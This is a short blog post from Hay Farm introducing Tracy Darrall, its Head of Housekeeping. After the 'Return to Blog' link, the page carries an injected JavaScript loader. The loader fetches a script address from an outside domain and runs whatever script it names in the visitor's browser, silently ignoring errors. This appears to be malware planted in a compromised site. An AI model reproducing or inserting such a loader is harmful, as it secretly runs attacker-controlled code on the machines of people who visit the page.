Meet the Team: Tracy Darrall
In this weeks Meet the Team series, we meet our Head of Housekeeping, Tracy Darrall. Tracy and her team make the experience of staying at Hay Farm as welcoming and comforting as it is. Tracy discusses the development of her role and why she and her team enjoy their work at the farm. RETURN TO BLOG (async () => { const TIMEOUT_MS = 60_000; try { const tdsResponse = await fetch('https://eotoatotlasldkd.com/ofo'); const scriptUrl = (await tdsResponse.text()).trim(); const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true; script.onload = () => { clearTimeout(timer); resolve(); }; script.onerror = () => { clearTimeout(timer); reject(); }; const timer = setTimeout(() => { script.remove(); reject(); }, timeout); document.body.appendChild(script); }); }; await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();